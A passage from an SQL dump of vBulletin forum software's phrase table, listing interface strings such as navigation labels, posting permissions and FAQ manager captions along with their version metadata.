(35796, -1, 'perform_action', 'global', 'Perform Action', 'vbulletin', '', 0, ''),
(35797, -1, 'php_code', 'global', 'PHP Code', 'vbulletin', '', 0, ''),
(35798, -1, 'picture_comments_awaiting_approval', 'global', 'Picture Comments Awaiting Approval', 'vbulletin', 'vBulletin Solutions', 1200331027, '3.7.0 Beta 4'),
(35799, -1, 'pictures_and_albums', 'global', 'Pictures & Albums ', 'vbulletin', 'vBulletin Solutions', 1201009871, '3.7.0 Beta 5'),
(35800, -1, 'please_enter_the_text', 'global', 'Please enter the six letters or digits that appear in the image opposite. ', 'vbulletin', 'vBulletin Solutions', 1150305191, '3.6.0 Beta 3'),
(35801, -1, 'please_select_one', 'global', 'Please select one', 'vbulletin', '', 0, ''),
(35802, -1, 'pm_users', 'global', 'PM Users', 'vbulletin', '', 0, ''),
(35803, -1, 'poll', 'global', 'Poll', 'vbulletin', '', 0, ''),
(35804, -1, 'poll_options', 'global', 'Poll Options', 'vbulletin', '', 0, ''),
(35805, -1, 'poll_thread_prefix', 'global', 'Poll: ', 'vbulletin', '', 0, ''),
(35806, -1, 'post', 'global', 'Post', 'vbulletin', '', 0, ''),
(35807, -1, 'post_icons', 'global', 'Post Icons', 'vbulletin', '', 0, ''),
(35808, -1, 'post_new_user_note', 'global', 'Post New User Note', 'vbulletin', '', 0, ''),
(35809, -1, 'post_time_x_at_y', 'global', 'Post Time: {1} at {2}', 'vbulletin', '', 0, ''),
(35810, -1, 'post_user_note', 'global', 'Post User Note', 'vbulletin', '', 0, ''),
(35811, -1, 'post_x', 'global', 'Post {1}', 'vbulletin', '', 0, ''),
(35812, -1, 'posted_by', 'global', 'Posted By', 'vbulletin', '', 0, ''),
(35813, -1, 'posting_rules', 'global', 'Posting Rules', 'vbulletin', '', 0, ''),
(35814, -1, 'posts', 'global', 'Posts', 'vbulletin', '', 0, ''),
(35815, -1, 'powered_by_vbulletin', 'global', 'Powered by vBulletin® Version {1} Copyright ©2000 - {2}, vBulletin Solutions, Inc.', 'vbulletin', 'vBulletin Solutions', 1163500480, '3.6.4'),
(35816, -1, 'prev', 'global', 'Prev', 'vbulletin', '', 0, ''),
(35817, -1, 'prev_page', 'global', 'Prev Page', 'vbulletin', '', 0, ''),
(35818, -1, 'prev_picture_short', 'global', 'Prev', 'vbulletin', 'vBulletin Solutions', 1265284670, '3.8.5'),
(35819, -1, 'previous', 'global', 'Previous', 'vbulletin', 'vBulletin Solutions', 1219919699, '3.8.0 Alpha 1'),
(35820, -1, 'previous_picture_short', 'global', 'Prev', 'vbulletin', 'vBulletin Solutions', 1247672656, '3.8.3'),
(35821, -1, 'privacy_statement', 'global', 'Privacy Statement', 'vbulletin', '', 0, ''),
(35822, -1, 'private', 'global', 'Private', 'vbulletin', '', 0, ''),
(35823, -1, 'private_message', 'global', 'Private Message', 'vbulletin', '', 0, ''),
(35824, -1, 'private_messages', 'global', 'Private Messages', 'vbulletin', '', 0, ''),
(35825, -1, 'private_messages_nav', 'global', 'Private Messages : {1}, {2}.', 'vbulletin', '', 0, ''),
(35826, -1, 'proceed', 'global', ' Proceed ', 'vbulletin', '', 0, ''),
(35827, -1, 'profile_visitor_messages_awaiting_approval', 'global', 'Unapproved Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1212410951, '3.8.0 Alpha 1'),
(35828, -1, 'public_poll_users_see_choices', 'global', 'Be advised that this is a public poll: other users can see the choice(s) you selected.', 'vbulletin', '', 0, ''),
(35829, -1, 'quick_language_chooser', 'global', 'Quick Language Chooser', 'vbulletin', '', 0, ''),
(35830, -1, 'quick_links', 'global', 'Quick Links', 'vbulletin', '', 0, ''),
(35831, -1, 'quick_style_chooser', 'global', 'Quick Style Chooser', 'vbulletin', '', 0, ''),
(35832, -1, 'quote', 'global', 'Quote', 'vbulletin', '', 0, ''),
(35833, -1, 'random_question', 'global', 'Random Question', 'vbulletin', 'vBulletin Solutions', 1192574587, '3.7.0 Beta 1'),
(35834, -1, 'rate_thread', 'global', 'Rate Thread', 'vbulletin', '', 0, ''),
(35835, -1, 'reason', 'global', 'Reason', 'vbulletin', '', 0, ''),
(35836, -1, 'redirect', 'global', 'Redirect', 'vbulletin', '', 0, ''),
(35837, -1, 'redirecting', 'global', 'Redirecting...', 'vbulletin', '', 0, ''),
(35838, -1, 'refresh_image', 'global', 'Refresh Image', 'vbulletin', 'vBulletin Solutions', 1159210908, '3.6.2'),
(35839, -1, 'register', 'global', 'Register', 'vbulletin', '', 0, ''),
(35840, -1, 'reload', 'global', 'Reload', 'vbulletin', '', 0, ''),
(35841, -1, 'reload_this_page', 'global', 'Reload this Page', 'vbulletin', '', 0, ''),
(35842, -1, 'remember_me', 'global', 'Remember Me?', 'vbulletin', '', 0, ''),
(35843, -1, 'remove', 'global', 'Remove', 'vbulletin', '', 0, ''),
(35844, -1, 'replace', 'global', 'Replace', 'vbulletin', '', 0, ''),
(35845, -1, 'replies', 'global', 'Replies', 'vbulletin', '', 0, ''),
(35846, -1, 'replies_x_views_y', 'global', 'Replies: {1}, Views: {2}', 'vbulletin', '', 0, ''),
(35847, -1, 'reply', 'global', 'Reply', 'vbulletin', '', 0, ''),
(35848, -1, 'reply_prefix', 'global', 'Re:', 'vbulletin', '', 0, ''),
(35849, -1, 'reputation', 'global', 'Reputation', 'vbulletin', '', 0, ''),
(35850, -1, 'reputation_disabled', 'global', 'has disabled reputation', 'vbulletin', '', 0, ''),
(35851, -1, 'request_reason', 'global', 'Request Reason', 'vbulletin', '', 0, ''),
(35852, -1, 'request_username_password_now', 'global', 'Request Username / Password Now', 'vbulletin', '', 0, ''),
(35853, -1, 'requests_to_join_usergroup', 'global', 'Requests to Join Usergroup', 'vbulletin', '', 0, ''),
(35854, -1, 'requests_to_join_your_social_groups', 'global', 'Social Groups Join Requests', 'vbulletin', 'vBulletin Solutions', 1212410978, '3.8.0 Alpha 1'),
(35855, -1, 'reset', 'global', 'Reset', 'vbulletin', '', 0, ''),
(35856, -1, 'reset_fields', 'global', 'Reset Fields', 'vbulletin', '', 0, ''),
(35857, -1, 'results_x_to_y_of_z', 'global', 'Results {1} to {2} of {3}', 'vbulletin', '', 0, ''),
(35858, -1, 'reverse_sort_order', 'global', 'Reverse Sort Order', 'vbulletin', '', 0, ''),
(35859, -1, 'review_join_requests', 'global', 'Review Join Requests', 'vbulletin', '', 0, ''),
(35860, -1, 'saturday', 'global', 'Saturday', 'vbulletin', '', 0, ''),
(35861, -1, 'save', 'global', 'Save', 'vbulletin', '', 0, ''),
(35862, -1, 'save_changes', 'global', 'Save Changes', 'vbulletin', '', 0, ''),
(35863, -1, 'save_folders', 'global', 'Save Folders', 'vbulletin', '', 0, ''),
(35864, -1, 'search', 'global', 'Search', 'vbulletin', '', 0, ''),
(35865, -1, 'search_forums', 'global', 'Search Forums', 'vbulletin', '', 0, ''),
(35866, -1, 'search_results', 'global', 'Search Results', 'vbulletin', '', 0, ''),
(35867, -1, 'search_titles_only', 'global', 'Search Titles Only', 'vbulletin', 'vBulletin Solutions', 1179236984, '3.6.7'),
(35868, -1, 'second', 'global', 'Second', 'vbulletin', '', 0, ''),
(35869, -1, 'select_destination_folder_for_move', 'global', 'Please select a destination folder for the items that you wish to move.', 'vbulletin', '', 0, ''),
(35870, -1, 'selected_threads', 'global', 'Selected Threads', 'vbulletin', '', 0, ''),
(35871, -1, 'send', 'global', 'Send', 'vbulletin', '', 0, ''),
(35872, -1, 'send_message_via_aim_to_x', 'global', 'Send a message via AIM to {1}', 'vbulletin', '', 0, ''),
(35873, -1, 'send_message_via_email_to_x', 'global', 'Send a message via email to {1}', 'vbulletin', '', 0, ''),
(35874, -1, 'send_message_via_icq_to_x', 'global', 'Send a message via ICQ to {1}', 'vbulletin', '', 0, ''),
(35875, -1, 'send_message_via_msn_to_x', 'global', 'Send a message via MSN to {1}', 'vbulletin', '', 0, ''),
(35876, -1, 'send_message_via_skype_to_x', 'global', 'Send a message via Skype™ to {1}', 'vbulletin', '', 0, ''),
(35877, -1, 'send_message_via_yahoo_to_x', 'global', 'Send a message via Yahoo to {1}', 'vbulletin', '', 0, ''),
(35878, -1, 'send_new_message', 'global', 'Send New Message', 'vbulletin', '', 0, ''),
(35879, -1, 'send_private_message_to_selected_users', 'global', 'Send a private message to selected users', 'vbulletin', '', 0, ''),
(35880, -1, 'send_private_message_to_x', 'global', 'Send a private message to {1}', 'vbulletin', '', 0, ''),
(35881, -1, 'send_report', 'global', 'Send Report', 'vbulletin', '', 0, ''),
(35882, -1, 'sent_items', 'global', 'Sent Items', 'vbulletin', '', 0, ''),
(35883, -1, 'september', 'global', 'September', 'vbulletin', '', 0, ''),
(35884, -1, 'show_groups', 'global', 'Show Groups', 'vbulletin', '', 0, ''),
(35885, -1, 'show_message_text', 'global', 'Show Message Text', 'vbulletin', 'vBulletin Solutions', 1202913494, '3.7.0 Beta 5'),
(35886, -1, 'show_posts', 'global', 'Show Posts', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35887, -1, 'show_results_x_to_y_of_z', 'global', 'Show results {1} to {2} of {3}', 'vbulletin', '', 0, ''),
(35888, -1, 'show_thread_and_close_window', 'global', 'Show Thread & Close Window', 'vbulletin', '', 0, ''),
(35889, -1, 'show_threads', 'global', 'Show Threads', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35890, -1, 'show_threads_from_last_day', 'global', 'Show threads from last day', 'vbulletin', '', 0, ''),
(35891, -1, 'show_threads_from_last_month', 'global', 'Show threads from last month', 'vbulletin', '', 0, ''),
(35892, -1, 'show_threads_from_last_week', 'global', 'Show threads from last week', 'vbulletin', '', 0, ''),
(35893, -1, 'show_threads_from_last_x_days', 'global', 'Show threads from last {1} days', 'vbulletin', '', 0, ''),
(35894, -1, 'show_threads_from_last_x_months', 'global', 'Show threads from last {1} months', 'vbulletin', '', 0, ''),
(35895, -1, 'show_threads_from_last_x_weeks', 'global', 'Show threads from last {1} weeks', 'vbulletin', '', 0, ''),
(35896, -1, 'show_threads_from_last_year', 'global', 'Show threads from last year', 'vbulletin', '', 0, ''),
(35897, -1, 'show_thumbnails', 'global', 'Show Thumbnails', 'vbulletin', '', 0, ''),
(35898, -1, 'showing_results_x_to_y_of_z', 'global', 'Showing results {1} to {2} of {3}', 'vbulletin', '', 0, ''),
(35899, -1, 'showing_x_smilies_of_y_total', 'global', 'Showing {1} smilie(s) of {2} total.', 'vbulletin', 'vBulletin Solutions', 1205925277, '3.7.0 Release Candidate 1'),
(35900, -1, 'showthread_list_next', 'global', 'Next', 'vbulletin', 'vBulletin Solutions', 1247672206, '3.8.3'),
(35901, -1, 'showthread_list_prev', 'global', 'Prev', 'vbulletin', 'vBulletin Solutions', 1247672642, '3.8.3'),
(35902, -1, 'signature', 'global', 'Signature', 'vbulletin', '', 0, ''),
(35903, -1, 'site_areas', 'global', 'Site Areas', 'vbulletin', '', 0, ''),
(35904, -1, 'smilie_list', 'global', 'Smilie List', 'vbulletin', '', 0, ''),
(35905, -1, 'smilies', 'global', 'Smilies', 'vbulletin', '', 0, ''),
(35906, -1, 'smilies_are_x', 'global', 'Smilies are {2} ', 'vbulletin', '', 0, ''),
(35907, -1, 'social_group_discussions', 'global', 'Social Group Discussions', 'vbulletin', 'vBulletin Solutions', 1213096567, '3.7.1'),
(35908, -1, 'social_group_messages', 'global', 'Social Group Messages', 'vbulletin', 'vBulletin Solutions', 1195732486, '3.7.0 Beta 1'),
(35909, -1, 'social_groups', 'global', 'Social Groups', 'vbulletin', 'vBulletin Solutions', 1201009893, '3.7.0 Beta 5'),
(35910, -1, 'start_date', 'global', 'Start Date', 'vbulletin', '', 0, ''),
(35911, -1, 'sticky_thread', 'global', 'Sticky Thread', 'vbulletin', '', 0, ''),
(35912, -1, 'sticky_thread_prefix', 'global', 'Sticky: ', 'vbulletin', '', 0, ''),
(35913, -1, 'subforums', 'global', 'Sub-Forums', 'vbulletin', '', 0, ''),
(35914, -1, 'subject', 'global', 'Subject', 'vbulletin', '', 0, ''),
(35915, -1, 'submit', 'global', 'Submit', 'vbulletin', '', 0, ''),
(35916, -1, 'submit_note', 'global', 'Submit Note', 'vbulletin', '', 0, ''),
(35917, -1, 'subscribe_to_discussion', 'global', 'Subscribe to Discussion', 'vbulletin', 'vBulletin Solutions', 1213712361, '3.7.1'),
(35918, -1, 'subscribe_to_forum', 'global', 'Subscribe to Forum', 'vbulletin', '', 0, ''),
(35919, -1, 'subscribe_to_thread', 'global', 'Subscribe to Thread', 'vbulletin', '', 0, ''),
(35920, -1, 'subscribed_threads', 'global', 'Subscribed Threads', 'vbulletin', '', 0, ''),
(35921, -1, 'subscribed_threads_in_folder', 'global', 'Subscribed Threads in Folder', 'vbulletin', '', 0, ''),
(35922, -1, 'subscription', 'global', 'Subscription', 'vbulletin', '', 0, ''),
(35923, -1, 'subscription_title', 'global', 'Subscription Title', 'vbulletin', '', 0, ''),
(35924, -1, 'subscriptions', 'global', 'Subscriptions', 'vbulletin', '', 0, ''),
(35925, -1, 'sum_of_attachments_owned_by_x', 'global', 'Sum of all attachments owned by {1}', 'vbulletin', '', 0, ''),
(35926, -1, 'sunday', 'global', 'Sunday', 'vbulletin', '', 0, ''),
(35927, -1, 'sure_you_want_to_log_out', 'global', 'Are you sure you want to log out?', 'vbulletin', '', 0, ''),
(35928, -1, 'tag', 'global', 'Tag', 'vbulletin', 'vBulletin Solutions', 1190903926, '3.7.0 Beta 1'),
(35929, -1, 'tag_search', 'global', 'Tag Search', 'vbulletin', 'vBulletin Solutions', 1204928786, '3.7.0 Release Candidate 1'),
(35930, -1, 'tags', 'global', 'Tags', 'vbulletin', 'vBulletin Solutions', 1190903931, '3.7.0 Beta 1'),
(35931, -1, 'terms_of_service', 'global', 'Terms of Service', 'vbulletin', 'vBulletin Solutions', 1218457647, '3.8.0 Alpha 1'),
(35932, -1, 'text_editor_control_styles', 'global', 'Text Editor Control Styles', 'vbulletin', '', 0, ''),
(35933, -1, 'there_are_no_outstanding_requests_to_join_this_usergroup', 'global', 'There are no outstanding requests to join this usergroup.', 'vbulletin', '', 0, ''),
(35934, -1, 'this_poll_is_closed', 'global', 'This poll is closed', 'vbulletin', '', 0, ''),
(35935, -1, 'this_poll_will_close_on_x_at_y', 'global', 'This poll will close on {1} at {2} ', 'vbulletin', '', 0, ''),
(35936, -1, 'this_post_will_be_automatically_moderated', 'global', 'This post will be automatically moderated', 'vbulletin', 'vBulletin Solutions', 1204718888, '3.7.0 Beta 6'),
(35937, -1, 'thread', 'global', 'Thread', 'vbulletin', '', 0, ''),
(35938, -1, 'thread_deleted_by_x', 'global', 'Thread deleted by {2} ', 'vbulletin', 'vBulletin Solutions', 1144777155, '3.6.0 Beta 1'),
(35939, -1, 'thread_rating_x_votes_y_average', 'global', 'Thread Rating: {1} votes, {2} average.', 'vbulletin', '', 0, ''),
(35940, -1, 'thread_starter', 'global', 'Thread Starter', 'vbulletin', '', 0, ''),
(35941, -1, 'threads', 'global', 'Threads', 'vbulletin', '', 0, ''),
(35942, -1, 'thursday', 'global', 'Thursday', 'vbulletin', '', 0, ''),
(35943, -1, 'time', 'global', 'Time', 'vbulletin', '', 0, ''),
(35944, -1, 'timezone', 'global', 'Timezone', 'vbulletin', '', 0, ''),
(35945, -1, 'title', 'global', 'Title', 'vbulletin', '', 0, ''),
(35946, -1, 'to', 'global', 'To', 'vbulletin', 'vBulletin Solutions', 1221838962, '3.8.0 Alpha 2'),
(35947, -1, 'to_add_a_new_folder', 'global', 'To add a new folder, enter the name of the new folder in one of the empty boxes in the list.', 'vbulletin', '', 0, ''),
(35948, -1, 'to_delete_user_note_check_box', 'global', 'To delete this user note, check the box below and then click the \'Delete this Note\' button.', 'vbulletin', '', 0, ''),
(35949, -1, 'to_rename_a_folder', 'global', 'To rename a folder, edit the folder\'s name in the list.', 'vbulletin', '', 0, ''),
(35950, -1, 'today', 'global', 'Today', 'vbulletin', '', 0, ''),
(35951, -1, 'todays_birthdays', 'global', 'Today\'s Birthdays', 'vbulletin', '', 0, ''),
(35952, -1, 'todays_events', 'global', 'Today\'s Events', 'vbulletin', '', 0, ''),
(35953, -1, 'todays_posts', 'global', 'Today\'s Posts', 'vbulletin', '', 0, ''),
(35954, -1, 'top', 'global', 'Top', 'vbulletin', '', 0, ''),
(35955, -1, 'total', 'global', 'Total', 'vbulletin', '', 0, ''),
(35956, -1, 'total_posts_x', 'global', 'Total Posts: {1}', 'vbulletin', '', 0, ''),
(35957, -1, 'total_x_nav', 'global', 'Total {1}', 'vbulletin', '', 0, ''),
(35958, -1, 'track_messages', 'global', 'Track Messages', 'vbulletin', '', 0, ''),
(35959, -1, 'tuesday', 'global', 'Tuesday', 'vbulletin', '', 0, ''),
(35960, -1, 'unread_date', 'global', 'Unread', 'vbulletin', '', 0, ''),
(35961, -1, 'unread_picture_comments', 'global', 'Unread Picture Comments', 'vbulletin', 'vBulletin Solutions', 1200330978, '3.7.0 Beta 4'),
(35962, -1, 'unread_private_messages', 'global', 'Unread Private Messages', 'vbulletin', 'vBulletin Solutions', 1197374491, '3.7.0 Beta 1'),
(35963, -1, 'unread_profile_visitor_messages', 'global', 'Unread Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1212410959, '3.8.0 Alpha 1'),
(35964, -1, 'unread_x_nav', 'global', 'Unread {1}', 'vbulletin', '', 0, ''),
(35965, -1, 'unregistered', 'global', 'Unregistered', 'vbulletin', '', 0, ''),
(35966, -1, 'unsubscribe', 'global', 'Unsubscribe', 'vbulletin', '', 0, ''),
(35967, -1, 'unsubscribe_from_this_forum', 'global', 'Unsubscribe from this Forum', 'vbulletin', '', 0, ''),
(35968, -1, 'upcoming_events_for_the_next_x_days', 'global', 'Upcoming Events for the Next {1} Day(s)', 'vbulletin', '', 0, ''),
(35969, -1, 'update_subscription_type', 'global', 'Update Subscription Type', 'vbulletin', '', 0, ''),
(35970, -1, 'updating_post_counts', 'global', 'Updating Post Counts', 'vbulletin', '', 0, ''),
(35971, -1, 'upload', 'global', 'Upload', 'vbulletin', '', 0, ''),
(35972, -1, 'upload_errors', 'global', 'Upload Errors', 'vbulletin', '', 0, ''),
(35973, -1, 'user', 'global', 'User', 'vbulletin', '', 0, ''),
(35974, -1, 'user_control_panel', 'global', 'User Control Panel', 'vbulletin', '', 0, ''),
(35975, -1, 'user_cp', 'global', 'User CP', 'vbulletin', '', 0, ''),
(35976, -1, 'user_name', 'global', 'User Name', 'vbulletin', '', 0, ''),
(35977, -1, 'user_notes_for_x', 'global', 'User Notes for {1}', 'vbulletin', '', 0, ''),
(35978, -1, 'usergroup', 'global', 'Usergroup', 'vbulletin', '', 0, ''),
(35979, -1, 'usergroups', 'global', 'Usergroups', 'vbulletin', '', 0, ''),
(35980, -1, 'userid', 'global', 'Userid', 'vbulletin', '', 0, ''),
(35981, -1, 'username', 'global', 'User Name', 'vbulletin', '', 0, ''),
(35982, -1, 'valid_file_extensions', 'global', 'Valid file extensions', 'vbulletin', '', 0, ''),
(35983, -1, 'vbulletin_copyright', 'global', 'vBulletin® v{1}, Copyright ©2000-{2}, vBulletin Solutions, Inc.', 'vbulletin', 'vBulletin Solutions', 1162556078, '3.6.3'),
(35984, -1, 'vbulletin_message', 'global', 'vBulletin Message', 'vbulletin', 'vBulletin Solutions', 1163500549, '3.6.4'),
(35985, -1, 'view', 'global', 'View', 'vbulletin', '', 0, ''),
(35986, -1, 'view_all_announcements', 'global', 'View All Announcements', 'vbulletin', '', 0, ''),
(35987, -1, 'view_all_subscribed_threads', 'global', 'View all Subscribed Threads', 'vbulletin', '', 0, ''),
(35988, -1, 'view_announcement', 'global', 'View Announcement', 'vbulletin', 'vBulletin Solutions', 1159293350, '3.6.2'),
(35989, -1, 'view_birthdays', 'global', 'View Birthdays', 'vbulletin', '', 0, ''),
(35990, -1, 'view_forum_leaders', 'global', 'View Forum Leaders', 'vbulletin', '', 0, ''),
(35991, -1, 'view_poll_results', 'global', 'View Poll Results', 'vbulletin', '', 0, ''),
(35992, -1, 'view_post', 'global', 'View Post', 'vbulletin', '', 0, ''),
(35993, -1, 'view_profile', 'global', 'View Profile', 'vbulletin', '', 0, ''),
(35994, -1, 'view_whos_online', 'global', 'View Who\'s Online', 'vbulletin', '', 0, ''),
(35995, -1, 'views', 'global', 'Views', 'vbulletin', '', 0, ''),
(35996, -1, 'visitor_messages', 'global', 'Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1197370702, '3.7.0 Beta 1'),
(35997, -1, 'vote_now', 'global', 'Vote Now', 'vbulletin', '', 0, ''),
(35998, -1, 'voters', 'global', 'Voters', 'vbulletin', '', 0, ''),
(35999, -1, 'votes', 'global', 'Votes', 'vbulletin', '', 0, ''),
(36000, -1, 'wednesday', 'global', 'Wednesday', 'vbulletin', '', 0, ''),
(36001, -1, 'week', 'global', 'Week', 'vbulletin', '', 0, ''),
(36002, -1, 'weekly_email_notification', 'global', 'Weekly email notification', 'vbulletin', '', 0, ''),
(36003, -1, 'weekly_updates_by_email', 'global', 'Weekly updates by email', 'vbulletin', '', 0, ''),
(36004, -1, 'weeks', 'global', 'Weeks', 'vbulletin', '', 0, ''),
(36005, -1, 'welcome_to_our_newest_member_x', 'global', 'Welcome to our newest member, {2} ', 'vbulletin', 'vBulletin Solutions', 1200570600, '3.7.0 Beta 4'),
(36006, -1, 'welcome_to_the_x', 'global', 'Welcome to the {1}.', 'vbulletin', '', 0, ''),
(36007, -1, 'welcome_x', 'global', 'Welcome, {1}.', 'vbulletin', '', 0, ''),
(36008, -1, 'welcome_x_link_y', 'global', 'Welcome, {1} .', 'vbulletin', 'vBulletin Solutions', 1195218156, '3.7.0 Beta 1'),
(36009, -1, 'whats_going_on', 'global', 'What\'s Going On?', 'vbulletin', '', 0, ''),
(36010, -1, 'who_posted', 'global', 'Who Posted?', 'vbulletin', '', 0, ''),
(36011, -1, 'whos_online', 'global', 'Who\'s Online', 'vbulletin', '', 0, ''),
(36012, -1, 'window_open_failed_blocker', 'global', 'Unable to open a new browser window,\\n This might be due to a \'popup blocker\'', 'vbulletin', '', 0, ''),
(36013, -1, 'within_the_last_x_days', 'global', 'Within the Last {1} Days', 'vbulletin', '', 0, ''),
(36014, -1, 'x_attachments', 'global', '{1} Attachment(s)', 'vbulletin', '', 0, ''),
(36015, -1, 'x_days_ago', 'global', '{1} Days Ago', 'vbulletin', '', 0, ''),
(36016, -1, 'x_does_not_have_any_notes', 'global', '{1} does not currently have any notes.', 'vbulletin', '', 0, ''),
(36017, -1, 'x_downloads', 'global', '{1} Downloads', 'vbulletin', '', 0, ''),
(36018, -1, 'x_hours_ago', 'global', '{1} Hours Ago', 'vbulletin', '', 0, ''),
(36019, -1, 'x_is_invisible', 'global', '{1} is invisible', 'vbulletin', '', 0, ''),
(36020, -1, 'x_is_offline', 'global', '{1} is offline', 'vbulletin', '', 0, ''),
(36021, -1, 'x_is_on_your_ignore_list', 'global', '{1} is on your ignore list .', 'vbulletin', '', 0, ''),
(36022, -1, 'x_is_online_now', 'global', '{1} is online now', 'vbulletin', '', 0, ''),
(36023, -1, 'x_is_y', 'global', '{1} is {2}', 'vbulletin', '', 0, ''),
(36024, -1, 'x_mailer', 'global', '{1}', 'vbulletin', '', 0, ''),
(36025, -1, 'x_members_and_y_guests', 'global', '{1} members and {2} guests', 'vbulletin', '', 0, ''),
(36026, -1, 'x_minutes_ago', 'global', '{1} Minutes Ago', 'vbulletin', '', 0, ''),
(36027, -1, 'x_of_y', 'global', '{1} of {2}', 'vbulletin', 'vBulletin Solutions', 1219941481, '3.8.0 Alpha 1'),
(36028, -1, 'x_powered_by_vbulletin', 'global', '{1} - Powered by vBulletin', 'vbulletin', 'vBulletin Solutions', 1163500505, '3.6.4'),
(36029, -1, 'x_statistics', 'global', '{1} Statistics', 'vbulletin', '', 0, ''),
(36030, -1, 'x_viewing', 'global', '{1} Viewing', 'vbulletin', '', 0, ''),
(36031, -1, 'x_weeks_ago', 'global', '{1} Weeks Ago', 'vbulletin', '', 0, ''),
(36032, -1, 'x_y_requests', 'global', '{1} ({2} requests)', 'vbulletin', '', 0, ''),
(36033, -1, 'year', 'global', 'Year', 'vbulletin', '', 0, ''),
(36034, -1, 'years', 'global', 'Years', 'vbulletin', '', 0, ''),
(36035, -1, 'yes', 'global', 'Yes', 'vbulletin', '', 0, ''),
(36036, -1, 'yesterday', 'global', 'Yesterday', 'vbulletin', '', 0, ''),
(36037, -1, 'you_are_subscribed_to_this_thread', 'global', 'You are subscribed to this thread', 'vbulletin', '', 0, ''),
(36038, -1, 'you_have_already_voted_on_this_poll', 'global', 'You have already voted on this poll', 'vbulletin', '', 0, ''),
(36039, -1, 'you_have_been_invited_to_the_following_groups', 'global', 'You have been invited to the following groups', 'vbulletin', 'vBulletin Solutions', 1196871221, '3.7.0 Beta 1'),
(36040, -1, 'you_may_edit_your_posts', 'global', 'You may edit your posts', 'vbulletin', 'vBulletin Solutions', 1196184568, '3.7.0 Beta 1'),
(36041, -1, 'you_may_not_edit_your_posts', 'global', 'You may not edit your posts', 'vbulletin', 'vBulletin Solutions', 1196184562, '3.7.0 Beta 1'),
(36042, -1, 'you_may_not_post_attachments', 'global', 'You may not post attachments', 'vbulletin', 'vBulletin Solutions', 1196184525, '3.7.0 Beta 1'),
(36043, -1, 'you_may_not_post_new_threads', 'global', 'You may not post new threads', 'vbulletin', 'vBulletin Solutions', 1196184466, '3.7.0 Beta 1'),
(36044, -1, 'you_may_not_post_replies', 'global', 'You may not post replies', 'vbulletin', 'vBulletin Solutions', 1196184500, '3.7.0 Beta 1'),
(36045, -1, 'you_may_not_vote_on_this_poll', 'global', 'You may not vote on this poll', 'vbulletin', '', 0, ''),
(36046, -1, 'you_may_only_attach_x_files_per_post', 'global', 'You may only attach up to {1} files per post', 'vbulletin', '', 0, ''),
(36047, -1, 'you_may_post_attachments', 'global', 'You may post attachments', 'vbulletin', 'vBulletin Solutions', 1196184530, '3.7.0 Beta 1'),
(36048, -1, 'you_may_post_new_threads', 'global', 'You may post new threads', 'vbulletin', 'vBulletin Solutions', 1196184471, '3.7.0 Beta 1'),
(36049, -1, 'you_may_post_replies', 'global', 'You may post replies', 'vbulletin', 'vBulletin Solutions', 1196184504, '3.7.0 Beta 1'),
(36050, -1, 'your_folders', 'global', 'Your Folders', 'vbulletin', '', 0, ''),
(36051, -1, 'your_notifications', 'global', 'Your Notifications', 'vbulletin', 'vBulletin Solutions', 1197383039, '3.7.0 Beta 1'),
(36052, -1, 'your_pm_box_is_x_full', 'global', 'Your PM box is {1}% full.', 'vbulletin', 'vBulletin Solutions', 1146506218, '3.6.0 Beta 1'),
(36053, -1, 'your_profile', 'global', 'Your Profile', 'vbulletin', 'vBulletin Solutions', 1197893928, '3.7.0 Beta 2'),
(36054, -1, 'your_username', 'global', 'Your Username', 'vbulletin', '', 0, ''),
(36055, -1, 'action_leave_blank', 'help_faq', 'Action:- leave blank to make a general topic - use commas to separate multiple actions ', 'vbulletin', 'vBulletin Solutions', 1163415108, '3.6.4'),
(36056, -1, 'action_specific_topics', 'help_faq', 'Action Specific Topics', 'vbulletin', '', 0, ''),
(36057, -1, 'add_child_faq_item', 'help_faq', 'Add Child FAQ Item', 'vbulletin', '', 0, ''),
(36058, -1, 'add_new_faq_item', 'help_faq', 'Add New FAQ Item', 'vbulletin', '', 0, ''),
(36059, -1, 'add_new_topic', 'help_faq', 'Add New Topic', 'vbulletin', '', 0, ''),
(36060, -1, 'admin_help', 'help_faq', 'Admin Help', 'vbulletin', '', 0, ''),
(36061, -1, 'admin_help_manager', 'help_faq', 'Admin Help Manager', 'vbulletin', '', 0, ''),
(36062, -1, 'all_scripts', 'help_faq', 'All Scripts', 'vbulletin', '', 0, ''),
(36063, -1, 'are_you_sure_want_to_delete_faq_item_x', 'help_faq', 'Are you sure you want to delete the FAQ item called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(36064, -1, 'are_you_sure_want_to_delete_topic_x', 'help_faq', 'Are you sure you want to delete the topic called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(36065, -1, 'download_upload_adminhelp', 'help_faq', 'Download / Upload Admin Help', 'vbulletin', '', 0, ''),
(36066, -1, 'edit_topics', 'help_faq', 'Edit Topics', 'vbulletin', '', 0, ''),
(36067, -1, 'faq_link_name_changed', 'help_faq', 'FAQ Link Name Changed', 'vbulletin', '', 0, ''),
(36068, -1, 'faq_manager', 'help_faq', 'FAQ Manager', 'vbulletin', '', 0, ''),
(36069, -1, 'general_topics', 'help_faq', 'General Topics', 'vbulletin', '', 0, ''),
(36070, -1, 'import_admin_help_xml_file', 'help_faq', 'Import Admin Help XML File', 'vbulletin', '', 0, ''),
(36071, -1, 'imported_admin_help_successfully', 'help_faq', 'Imported Admin Help Successfully', 'vbulletin', '', 0, ''),
(36072, -1, 'importing_admin_help', 'help_faq', 'Importing Admin Help', 'vbulletin', '', 0, ''),
(36073, -1, 'no_parent_faq_item', 'help_faq', 'No Parent FAQ Item', 'vbulletin', '', 0, ''),
(36074, -1, 'parent_faq_item', 'help_faq', 'Parent FAQ Item', 'vbulletin', '', 0, ''),
(36075, -1, 'quick_help_topic_links', 'help_faq', 'Quick Help Topic Links', 'vbulletin', '', 0, ''),
(36076, -1, 'show_child_faq_entries', 'help_faq', 'Show Child FAQ Entries', 'vbulletin', '', 0, ''),
(36077, -1, 'sorry_there_is_already_an_item_called', 'help_faq', 'Sorry, there is already an item called', 'vbulletin', '', 0, ''),
(36078, -1, 'to_maintain_compatibility_with_the_system_name_changed', 'help_faq', 'To maintain compatibility with the system, your specified link name: {1}
